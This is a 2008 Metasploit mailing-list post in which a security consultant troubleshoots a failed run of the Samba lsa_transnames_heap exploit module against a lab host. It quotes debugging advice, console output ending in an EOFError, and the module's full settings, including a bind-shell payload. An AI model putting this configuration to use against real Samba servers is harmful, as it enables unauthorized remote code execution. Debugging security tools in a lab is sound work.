Metasploit mailing list archives
linux/samba/lsa_transnames_heap: "Error: EOFError: end of file reached"
From: hal at deer-run.com (Hal Pomeranz)
Date: Sat, 5 Apr 2008 18:49:36 -0700
Thanks for the response, HD. I wish I had better news for you...
At first glance, I would guess that your log-level in the smbd.conf is set to a non-default value (this causes the exploit to fail because it changes the layout of overwritten structures).
I'm using the stock smb.conf file and "log level" is not explicitly set (nor am I setting it on the command line). During previous attempts I actually did try setting "log level" to values < 2 (per the exploit info)-- no change to the result. I've definitely killed/restarted the server since reverting to the original smb.conf.
In order to determine what caused the EOF error, run the following:

msf> setg LogLevel 5
msf> save
msf> use exploit/.../
msf> exploit

Take a look at .msf3/logs/framework.log (at the end) and see if there is any obvious stack trace (or send me a copy off-list).
I'm getting nothing in framework.log when the exploit runs. Btw, here's the tail of my latest run, showing the output of "set":

[*] Trying to exploit Samba with address 0xb80c3000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0 at ncacn_np:10.66.254.244[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0 at ncacn_np:10.66.254.244[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Error: EOFError: end of file reached
msf exploit(lsa_transnames_heap) > set

Global
======

  Name      Value
  ----      -----
  LogLevel  5

Module: linux/samba/lsa_transnames_heap
=======================================

  Name                             Value
  ----                             -----
  AppendExit                       false
  BruteStep                        0
  BruteWait                        0
  ConnectTimeout                   10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          false
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  EnableContextEncoding            false
  EncoderDontFallThrough           false
  LPORT                            4444
  PAYLOAD                          linux/x86/shell_bind_tcp
  PrependSetresuid                 true
  PrependSetreuid                  true
  PrependSetuid                    true
  RHOST                            10.66.254.244
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                false
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size         1024
  SMB::pipe_write_min_size         1
  SMBDirect                        true
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          LSARPC
  SMBPass
  SMBUser
  SSL                              false
  TARGET                           4
  TCP::max_send_size               0
  TCP::send_delay                  0
  WfsDelay                         0

I'm open to further suggestions...

--
Hal Pomeranz, Founder/CEO
Deer Run Associates
hal at deer-run.com
Network Connectivity and Security, Systems Management, Training